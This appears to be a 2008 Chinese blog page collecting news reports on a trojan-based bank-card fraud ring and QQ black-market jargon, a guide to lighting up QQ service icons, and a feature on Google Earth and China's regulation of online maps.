就在今年6月,陈军刚刚代理完一宗特大信用卡诈骗案陈军告诉记者,此案的首脑之一是一名来自广东惠州的80后年轻人此人是一名颇为典型的信封售卖者,网上人称顶狐2006年,他制作了一款名为顶狐下载者的软件,放在网络上供人使用但在下载者当中,却潜藏了另一款名为顶狐结巴的木马软件网友一旦使用了顶狐下载者,潜藏在其中的顶狐结巴就会潜入电脑,不停将网友的个人信息发送到制作者指定的网络空间而与部分木马软件稍有不同的是,顶狐结巴具有记录键盘敲击的功能,因而,在卖出的信封中,就包含不少网上银行的账号和密码起初,顶狐仅是将这样的信用卡信封以400元/GB的价格出售中间人金星2007年,金星结识了在各地流窜作案的伪造信用卡犯罪分子龚永强后,虚拟犯罪迅速与现实接轨,并制造了引起公安部高度重视的3·5特大网上银行盗窃案其中,顶狐负责分离网银信息,金星负责周转,龚永强则利用这样的信息制作假冒的银行卡后去银行取钱,总计盗窃作案七次,盗取人民币140余万元,从中得款40多万元,分给同伙100余万元
什么是QQ信封
QQ信封是QQ黑市的特殊名词QQ信封般在许多QQ交易论坛里面都会看见这几个字,所谓的QQ信封就是黑客通过非法手段(放木马,入侵别人电脑,窃取局域网信息)得来的QQ号码和密码,以万为单位保存的信息文本
信封又分为一手信封(原始的,黑客将盗来的QQ号码和密码不经过任何工具,随机储存的),二手信封(已经被黑客工具将里面有价值的号码取出,所剩下的号码)以及N手信封
洗信通过一些黑客工具,将一手信里面有价值的号码(号码里面有QB的,无保护的靓号,5位6位的靓号等)筛选出来的过程
死保号有密码保护,但是因为时间过长而忘记密码保护***的号码
散币不成整数的QB数量 ----------------------------
一键转贴,快速捕捉生活精彩,赢每周好礼! 评论这张
转发至微博
( Wed, 9 Jul 2008 21:08:00 +0800 )
Description:
教你如何点亮QQ图标
目前QQ的服务越来越多,客户端上的图标也越来越多,很多朋友想点亮一些图标,但却苦于不知如何操作,对此我们整理一份图标点亮攻略送给大家。 [Q
吧]:
当前Q吧积分≥0,在Q吧的社区档案登录并点击[点亮图标]按钮。(
进入Q吧页面)
1、Q吧积分被扣至负分。2、连续14日未登录并未阅读Q吧帖子。两个条件满足其中之一,就会熄灭。 [QQ
堂]:
QQ堂积分达到500分以上即可(
进入QQ堂客户端下载页面) [财付通]:
成功注册财付通并进行充值后或注册后产生相关财付通交易均可点亮。(
进入财付通注册页面) [QQlive]
使用后达到
三颗星星级别以上即可。(
进入QQlive客户端下载页面) [QQ
会员]:
开通会员服务即可(
进入开通页面,10元/月) [QQ
空间]:
开通QQ空间即可(
进入开通页面,免费注册) [QQ
红钻]:
开通红钻服务即可(
进入开通页面,10元/月) [QQ
黄钻]:
开通黄钻服务即可(
进入开通页面,10元/月) [QQ
蓝钻]:
开通蓝钻服务即可(
进入开通页面,10元/月) [Q
堂紫钻]:
开通紫钻服务即可(
进入开通页面,10元/月) [音速紫钻]:
开通紫钻服务即可(
进入开通页面,10元/月) [QQ
粉钻]:
开通粉钻服务即可(
进入开通页面,10元/月) [QQ
绿钻]:
开通绿钻服务即可(
进入开通页面,10元/月)
钻]:
开通黑钻服务即可(
进入开通页面,20元/月)
注:需要使用QQ2008正式版(耐心等待)才可以在QQ上看到黑钻图标。 [QQ
宠物]:
拥有QQ宠物即可(
进入领养页面) [QQ
音速]:
该大区游戏人物等级达到6级并且点亮图标时需要扣除5颗种子。
进入点亮操作页面)
一个月内未活跃的用户将会自动熄灭QQ音速图标 [QQ
幻想]:
QQ幻想角色达到10级以上即可(
进入幻想客户端下载页面) [QQ
三国]:
游戏中,当师傅中至少有一个徒弟在线,并且徒弟等级达到20级后,方可点亮图标。(
进入QQ三国客户端下载页面) [QQ
华夏]:
QQ华夏游戏角色达到25级即可(
进入QQ华夏客户端下载页面) [QQ
交友]:
注册QQ交友服务即可(
进入QQ交友注册页面) [QQ
家园]:
使用QQ空间迷你屋即可(
进入QQ家园页面) [QQ
相册]:
注册并上传照片即可(
进入QQ相册页面) [QQ
播客]:
页面设置即可(
进入设置页面,免费开通) [QQ
邮箱]:
使用QQ邮箱即可(默认为不点亮,在“邮箱设置”—“点亮邮箱图标”中操作,
进入到QQ邮箱) [QQ
书签]:
1、必须将QQ更新2007Beta3以上版本; 2、新的QQ书签用户,书签公开收藏数达到或者超过10条即可; 3、如果你在更新QQ2007Beta3之前已经是QQ书签的用户并且公开收藏已经超过了10条,只要再收藏1条公开收藏就可以点亮了(
进入QQ书签页面) [移动
开通超级QQ服务即可(
进入开通页面,10元/月) [手机
使用手机QQ软件登录即可(
进入手机QQ下载页面,免费下载) [Q
魅]:
注册服务即可(
妹页面,目前暂时停止内测注册) [会员炫铃]:
开通会员服务后免费设置炫铃即可(
进入设置页面,会员功能) [手机绑定]:
使用手机与QQ绑定后即可(
进入绑定页面,使用Q号登录后即可操作,免费注册) [3DQQ
秀]:
注册3D秀后,在3D秀商城购买物品,保存形象即可(
进入3D秀商城,免费注册) [视频标志]:
电脑已***视频设备(免费开通) [短信超人]:
开通短信超人服务即可(
进入开通页面,12元/月) [超级旋风]:
QQ旋风积分达到500分以上即可(
进入QQ旋风客户端下载页面) [腾讯图书]:
开通腾讯图书
服务即可(
进入腾讯图书
开通页面,
) [手机腾讯网]:
使用手机登录手机腾讯网即可(
进入手机腾讯网介绍页面,免费访问) [腾讯拍拍网卖家]:
在拍拍网通过卖家认证后即可
) [腾讯拍拍网会员]:
在拍拍网上购买了1件商品并成功进行财付通付款即可(
请您购物前先注册财付通,安全购物)
特别提醒:
以上两个图标每个用户只能点亮其一,若先点亮蓝色拍字图标则***拍字图标不能被点亮;若同时符合两个点亮规则的情况下优先点亮***拍字图标。) [滔滔]:
1、成功上传头像获得叨客***;2、成功邀请5名QQ好友加入滔滔且成为自己的叨友;3、在滔滔的活跃天数达到15天。
进入页面了解如何关联手机)
点亮图标之后,如果1周内不发表唠叨(通过任何渠道发布均可,不一定是手机短信),则自动熄灭图标,再次点亮图标,需要先取消手机关联后再重新关联一次。 [问问]:
使用过就有资格点亮,但测试阶段只有部分用户能点亮图标(
进入问问页面) [自由幻想]:
需要在QQ自由幻想中注册拥有角色,并且完成转职任务后就可以点亮图标了(
进入自由幻想客户端下载页面) [QQ音信]:
1、使用1次或多次QQ音信业务;2、找到1位已经点亮QQ音信图标的用户,
让他赠送一颗音信图标;获得赠送图标后,即可自动点亮QQ音信图标了。(
进入QQ音信页面) [QQ飞车]:
等级升到12级同时积满1800酷币,《QQ飞车》图标将自动点亮。而到达30级时,图标将升到一级,50级时图标升到二级,等级越高,你的图标也将变得越精致,越闪亮,越耀眼
进入QQ飞车客户端下载页面)
[穿越火线(CF)]:
图标可升级,按个人荣誉等级点亮对应图标。(图标次序等级由低至高)。
[QQ炫舞
在游戏内达到10等级即可。下载最新的QQ2008beta1版本后,次日即可点亮神秘的QQ炫舞图标。
[QQTALK]:
业务已下线,图标点亮规则撤消。
注:QQtalk图标点亮的用户在之前的规则里是不支持取消的,则无法取消该图标。 [QQ爱墙]:
QQ爱墙图标可通过用户间的赠送获得,获赠图标后将自动点亮爱墙图标。点亮爱墙图标后,还可获得系统赠送的5颗图标,用以赠送给其他爱墙用户,帮他人点亮图标QQ爱墙图标有效期为2个月。点此进入爱墙图标点亮业面。点亮图标后,每购买一张爱墙字条背景,即可将图标点亮时间延长2个月。(
QQ爱墙页面)
温馨提示:需***QQ2008 Beta1或以上版本的QQ,才能显示QQ爱墙图标。
[WAPQQ]:
只要登录一次WAPQQ业务,即成为WAPQQ的尊贵用户,小图标则会在接下来的三个月中点亮。
该图标点亮后不能取消。 [DNF]:
通过QQ登陆地下城与勇士,并且游戏角色等级达到18级,即可在官网点亮地下城与勇士图标。另:不同的级别会有不同的级别标识,相关细则请
查看了解。 [飞行岛]:
不删档内测期间,QQ飞行岛图标将可以提前点亮,只要达到18级,就能点亮图标,而且QQ飞行岛还推出新玩法,图标能根据级别的差异还能够变色。相关细则请
查看了解。 [CFvip]:
暂时无法点亮。 [寻仙]:
暂时无法点亮。
[QQ对战平台]:
暂时无法点亮。 评论这张
转发至微博
( Sat, 21 Jun 2008 20:20:00 +0800 )
Description:
“共享知识是人类发展的潮流,是无法阻挡的,抵制谷歌地球这样的好软件,就与当初抑制互联网一样,是不现实的.”
5月2日,英国《简氏情报评论》刊发了一则有关中国的报道,“通过'谷歌地球'的卫星照片可以确认,中国正在海南三亚地区建设一个巨大的潜艇基地.” 2007年10月16日,福州,亭江派出所的林祥春向大家展示谷歌地球(Google Earth)卫星地图软件所拍摄的辖区照片。 谷歌地球卫星地图软件所拍摄的辖区照片。
由于西方情报部门一直怀疑中国政府在海南建设了一些秘密军事设施,猜测那里有一个部分掩埋在地下的巨大海军基地,能够容纳20艘发射核导弹的潜艇.因此,消息一出,美国、法国、印度等国媒体如获至宝,纷纷跟踪报道:中国最新的“094”型战略核潜艇已经进驻新建的三亚海军基地.
虽然“谷歌地球”的有关三亚海军基地的照片目前没有经过任何一个国家的专业军事机构判断,但这件事的发生还是让人惊讶不已.
“谷歌地球”(Google Earth)是一款由美国谷歌公司2005年开发并免费提供使用的虚拟地球仪软件.与传统的网上平面地图相比,用“谷歌地球”搜索的地图是三维立体的,用起来更方便.
庞大的互联网用户群推动了整个网络地图产业爆发式的增长,谷歌的网络地图搜索已经成为仅次于内容搜索的第二大业绩增长点,微软、百度、新浪、搜狐等众多互联网巨头也看好这一市场,推出了自己的网络地图.“到2008年,网络地图已经形成超过百亿的经济规模.”中国测绘科学研究院GIS所所长、国家测绘局地名研究所所长李成名研究员告诉《北京科技报》.
网络地图的使用者不仅可以很方便地“飞上天空”,俯瞰自己居住的小区,寻找并标注住所、办公地、常去的酒店、银行以及儿时的住宅等等.世界各地还产生了大量的网络地图迷,以查找并标注全球各地的卫星照片为乐.他们有人标注世界各地的风景名胜,有人标注一些阿拉伯王国的豪华王宫,还有人标注出韩国一艘被台风掀翻的游轮.
当然,也有不少人乐此不疲地上网“发现”他国原本非常神秘的军事设施.在网络地图所提供的服务面前,全球大多数国家和地区的重要军事设施暴露无遗,这引起了一些国家对军事机密和国防安全的担心.
其实,网络地图的滥用在国外也引起了一些国家的强烈指责.印度内政部和国防部曾经联合发函给谷歌公司,指责谷歌地球的照片将印度首都新德里的国会大楼、孟买的航空母舰锚地、巴巴核反应堆及南部数个空军基地等设施“一网打尽”.印度总统卡拉姆警告说,恐怖分子会挑选在图片上清晰显示的地点发动袭击,使本处在恐怖阴霾下的印度国家安全形势雪上加霜.
韩国媒体也曾披露在谷歌地球提供的卫星照片服务中,赫然出现了韩国首都首尔及其周边地区针对朝鲜的防空阵地的照片.
“只需30秒,人们就可以登录谷歌地球网站寻找各种敏感地点”,英国《每日电讯报》一则披露恐怖分子正利用谷歌地球袭击英军基地的报道称,网民们在谷歌地球上可以轻而易举地找到英国特种部队支持大队总部驻地,还可以看到英国普斯毛斯港内的航母以及护卫舰,甚至英国军情六处伦敦总部.
国防大学张召忠教授告诉《北京科技报》:“谷歌地球上的照片,虽然坐标位置有一定误差,照片也都是几个月甚至几年前的,不能用到军事行动中.但对于一些固定设施,比如基地、港口等,有一定情报价值.”
中国人民公安大学教授王大伟也指出,谷歌地球上透露的一些中国军事敏感地区的图片,已经成为国外反华势力散布“中国威胁论”的主要证据.
但是,专门从事远程遥感测控的法国Fleximage公司在“谷歌地球对国防安全影响”的报告中指出,多国对谷歌地球威胁国家安全的指控不会取得什么结果,因为谷歌地球提供的数据都来自公共渠道,完全合法.报告认为:应对卫星图像泄密的问题,最好的方法就是做好伪装,而且这也是可行的.
谷歌公司的一名负责媒体宣传的女士告诉《北京科技报》,外界的指责“小题大做”,“我不能理解,为什么会有人认为'谷歌地球'泄露了所谓敏感军事设施的地点,要知道在美国,人们可以开车或者走路从这些军事机构门前路过,这些地点并不是什么秘密”.
2008年2月25日,国家测绘局、外交部、公安部、国家保密局等八个部门,联合出台了《关于加强互联网地图和地理信息服务网站监管的意见》.
“2007年,国家测绘局就通过采用网上搜索和重点抽查的方式,检查出登载网络地图的互联网站8962个,互联网地理信息服务网站595个.我可以毫不夸张地说,除了奥运官方网站和零星几个网站所刊登的地图以外,目前99%的网络地图没有依法经过国家或省级测绘行政主管部门审核批准.”负责国内网络地图监管的国家测绘局地图管理司司长李永雄对《北京科技报》说.
这些网络地图是通过何种方式运行的?李成名说,由于开发成本高昂,大部分互联网企业都是通过和国内几家具有国家测绘资质的电子地图服务商合作的方式推出自己的电子地图服务的.电子地图服务商有资格在全国范围内进行地图的测绘并生产地图数据,百度、谷歌和新浪等公司再将电子地图企业测绘所得的原始数据和自有的搜索引擎技术结合,制作成网上电子地图,供用户查询使用.据了解,目前国内已有超过3000家网站通过各种方式和各家电子地图服务商进行了合作,而且这个数字仍在快速地增长.
“由于地图数据的制作涉及一些国家机密,我国法律规定不准许外资介入,数据制作出来之后需要送往国家测绘局加密,有地图数据采集资质的公司也不例外.一份符合相关法律的电子地图的出版,至少要经过四大环节.” 李成名告诉记者.
首先,对相关的电子地图企业,要有资质审查.其次,通过了资质审查的企业,要在国家指定的有关机构内进行技术处理,以降低电子地图的精度,对高精密、高精度的位置坐标,要降低到既不影响国家安全,又能满足导航的需要;再者,电子地图的内容要经过政府有关部门的审查.最后,电子地图作为一种产品,要拿到市场销售还需要出版号,要得到相关部门的版号许可.
“但是,我们目前对于网络地图的管理几乎是空白,企业在没有任何监管的状况下经常打'擦边球'.”李永雄说.现在很少有公司能够把它购买的地图数据送往国家测绘局进行审核和加密处理.这就使一些不应该发布的地理信息出现在互联网上,出现大量的“问题地图”.
李永雄介绍:“一是错绘、漏绘,比如把中国领土台湾按独立国家表示,还有就是漏绘南海诸岛等现象.另一个是将涉及国家机密的相关信息标注在地图上,包括军事设施和民口,其中,民口指的是三峡大坝这样的水利设施、煤气出厂地、油库等.”
“另外,有些泄密问题,跟地图网站提供标注功能有关.” 李永雄说.
2007年2月,中国网友发现,在用“谷歌地球”搜索沈阳市区时,和平区和太原街附近很多地名都被改成了日文,在沈阳故宫门口,赤裸裸地出现了日本宪兵队!这件事引起了网友的一致谴责.事后,谷歌中国的发言人承认,谷歌地球的标识是用户标注的,Google事先应该是没有审核的.
“原来的地图,用户只能使用.对于网络地图具有交互性的特点,任何网站地图的注册用户都可以对自己感兴趣的地点进行标注.但由于缺少审核的环节,只要有一个用户加注了地图,其他成百上千的网络地图的用户就能在很短的时间里看到,使国家有关部门很难管理.”李成名介绍说.而由于标注功能,大量信息被丰富到网络地图上,这实际上能帮助别有用心的情报机构完成模糊情报的判断和确认工作.
“从中央领导人住处,到军用机场里面飞机的型号,都有网友在'谷歌地球'上标注过.”李永雄说.
